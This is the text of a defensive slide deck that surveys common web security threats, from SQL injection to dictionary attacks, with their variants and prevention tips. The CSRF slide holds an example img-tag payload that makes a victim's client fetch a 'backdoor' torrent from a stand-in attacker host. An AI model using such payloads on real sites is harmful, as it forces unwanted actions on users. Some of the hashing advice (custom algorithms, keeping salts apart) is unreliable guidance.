Security Vulnerabilities Securing Products and Services

Security Vulnerabilities

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Page 1: Security Vulnerabilities

Security VulnerabilitiesSecuring Products and Services

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Common Security Threats• URL Spoofing • Middleman Attacks• Cross-frame Scripting (XFS)• SQL Injection• Rainbow Table Matching (Hashing)• Denial of Service (DoS / DDoS)• Cross Site Scripting (XSS)• Cross-Site Request Forgery (CSRF)• Brute Force• Dictionary Attack

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URL Spoofing Impersonating trusted sources after redirecting to malicious destinations that appears to be legitimate.

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Variations & Types

• DNS server spoofing attack• Web site names and addresses

• Content theft • Name similarity• Link alteration


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Prevention & Detection

• Don’t capture any sensitive information from any link sent out (Register first then only use)

• Browser plugins that scan for Phishing URL’s

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Man in the Middle AttackMITM is session hijacking attack where a malicious party pretends to be the consumer to the trusted source and the trusted source to the consumer.

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Variations & Types

• Fake site that calls destination and do HTTP scraping• Other Session Hijacking types:

• Sidejacking - Sniffing data packets to steal session cookies and hijack a user’s session

• Evil Twin - Rouge Wi-Fi that intercepts communication• Sniffing - Network sniffing that intercepts



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• Use secure communication• VPN (Where possible)• Secure Websites (HTTPS) alerts if it is not a trusted


Prevention & Detection

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Cross-frame Scripting (XFS)“Data Leakage Through Frame Embed” - It’s a browser bug that allows an attacker to embed a victim’s site in their own, within a frame, and then spy on what’s done on the victim site e.g. like logging in.

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Variations & Types

Attack is singular in nature, the target page is loaded into an IFrame allowing host page full access to listen and manipulate interactions.


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• JavaScript – Load in top page only

• Response Header – Do not allow I-Frame

• Sandbox HRML 5 attribute enhances isolation but is still client enforced and support is browser/version specific

Prevention & Detection


Take note: NOT in the Meta data but added to each responses header.

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SQL InjectionWhen TSQL is entered into input fields in attempt to execute them when values are saved or retrieved.

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Variations & Types

• First Order Attack - Enters a malicious SQL string and tries to run it immediately to get the piece of information needed

• Second Order Attack - Get control of persistent storage systems like rows and perform malicious activity on them

• Lateral Injection - The attacker can manipulate implicit functions e.g. To_Char()


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• Do not execute Dynamic SQL [Query Strings] directly - Use sp_executesql to parameterize input

• Limit database privileges by context -Do not assign DB Owner right as Service Account

• Comprehensive data sanitization -Validate user input

Prevention & Detection

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Rainbow Table MatchingA Rainbow Table Attack is an attack that makes use of a pre-computed rainbow table. This table contains a common list of values with their hashes, if hash in the target is matched the original value can be deduced.

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Variations & Types

Rainbow Table Attacks follow the same general design. First get a rainbow table (A list of common passwords with their basic SHA hash values) then iterate through all the actual password hashes to find a match. Once found you can match that account back to the associated clear text password in the Rainbow Table.


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• Inforce complex password policies (Less Change of a match)

• Use salted hash• Use a custom algorithm that incorporates hash not just

prefix/postfix poetically only using a part of the SALT• Do not use single hash, random or random from list

• Do not store salt with hash values• If the structure and hash is known the algorithm could

be deduced. E.g. Knowing a single value and its hash.• Have a separate hash service only keep a ref to the

hash (random from list) used during the hashing.

Prevention & Detection

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Denial of ServiceDoS / DDoS attacks is when a service/site is flooded with bogus requests intended to crash it.

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Variations & Types

• Number of origins• DoS – Denial of Service from one source• DDoS – Distribute Denial of Service (Cloud / Trojans / etc.)

• Types of attacks• UDP Flood / ICMP (Ping) Flood / NTP Amplification • SYN Flood – Exploit TCP handshake• Ping of Death (POD) – malformed or malicious ping flood• Slowloris – Use another server to hold all connections• HTTP Flood – Actual HTTP Get/Posts


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• Ensure telemetry / alerts can identify strange behavior

• Defend your Parameter• Rate limit router• Add filters for high risk and known exclusions• Timeout half-open connections more aggressively • Drop spoofed / malformed packages• set lower SYN, ICMP, and UDP flood drop thresholds

Prevention & Detection


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Cross Site Scripting (XSS)“Forced JavaScript Execution” - The attacker either stores or reflects malicious client side scripts on a vulnerable website, which is then executed by the victim.

XSS exploits the trust that a client has for the website or application

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Variations & Types

• Stored XSS - Input is stored on the target server [E.g. Database] and then executed when rendered.

• Reflected XSS – When user input is immediately returned by a web application in an error message [Not Stored]

• DOM Based XSS - The entire tainted data flow happens in the browser


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• Context-sensitive data. I.E. Escaping HTML / JavaScript

• Safely validating untrusted HTML input• Using safe JavaScript APIs• Ensure HTTP trace/track is disabled in IIS (Can allow

accessing of verbose information)• Set HttpOnly flag  not allowing JavaScript access to

client side cookies

Prevention & Detection


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Cross-Site Request Forgery(XSRF /CSRF)An attack that forces an end user to execute unintended action on a web application in which they're currently authenticated.

XSRF exploits the trust that a site has for the user

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Variations & Types

• Replacing content with self executing actionsPrimarily in imbedding links e.g. images and malicious JavaScript<img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent">

• Login CSRFAn attacker may forge a request to log the victim into a target website using the attacker's credentials. Later this can then be used to access personal info. E.g. Google


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• Context of action changes associated risk• HTTP Get is easier to execute / imbed with less protection

than a POST. I.e. don’t use a get to alter state only to view.• Same-origin policy restrictions prevents some high risk

actions (e.g. XMLHttpRequest JavaScript posts) and dangerous access into external elements e.g. cannot access an I-Frame content that is referenced from another location.

• Check standard headers to verify the request is same origin

• Anti-CSRF tokens• Synchronizer Token Pattern (Session Specific)• Encrypted Token Pattern (Stateless)

Prevention & Detection


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Brute ForceTrial and error method used by application programs to decode encrypted data such as passwords by iterating through all possible combinations.

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Variations & Types

• Normal Brute ForceBrute force attacks work by calculating every possible combination that could make up a password and testing it to see if it is the correct password. As the password’s length increases, the amount of time, on average, to find the correct password increases exponentially.

• Reverse Brute ForceA single (usually common) password is tested against multiple usernames or encrypted files. The process may be repeated for a select few passwords


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• Complex Password PoliciesLength, Expiry, alphanumeric + special characters

• Account lockout•Lockout policy after 3 attempts•Could automatically re-enable after 30min with notifications to admin

• CAPTCHA•Verify that it is a human entering values and not a script when a account overheats (‘Heat’ measure based on failures etc.)

Prevention & Detection


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Dictionary AttackAn attempt to gain illicit access to a computer system by using a very large set of words to generate potential passwords.

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Variations & Types

• Personalized AttackUse tools like social media and social engineering to gather personal information like birthdays, pet names that are commonly used for passwords. A common source could be accessing less secure password sources (e.g. Browser passwords) and trying variations from that.

• Create list common combinations or passwords with high statistical probability of success. E.g. using password, sport team names, numbers and even combining common parts.


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• Complex Password PoliciesLength, Expiry, alphanumeric + special characters

• Account lockout•Lockout policy after 3 attempts•Could automatically re-enable after 30min with notifications to admin

• CAPTCHA•Verify that it is a human entering values and not a script when a account overheats (‘Heat’ measure based on failures etc.)

Prevention & Detection

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General Security Practices• Do not show error details publicly (Tokenize

errors)• Enforce strong vertical security (Each layer

adjoining to public layer must scrutinize any interaction with only relying on the Presentation tier’s attempts for enhanced UX)

• Enforce PoLP – Principle of least authority E.g.• Do not give Service Account DB Owner rights• Ensure roles are specialized and applied on all entry


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I am a Team Lead at Britehouse with international experience working predominantly on the Microsoft stack in the finance sector.

Marius Vorster

• LinkedIn - https://za.linkedin.com/in/mariusvrstr• Twitter Handle - @marius_vrstr• Emails – [email protected] /

[email protected]• SlideShare - https://www.slideshare.net/MariusVorster

More about me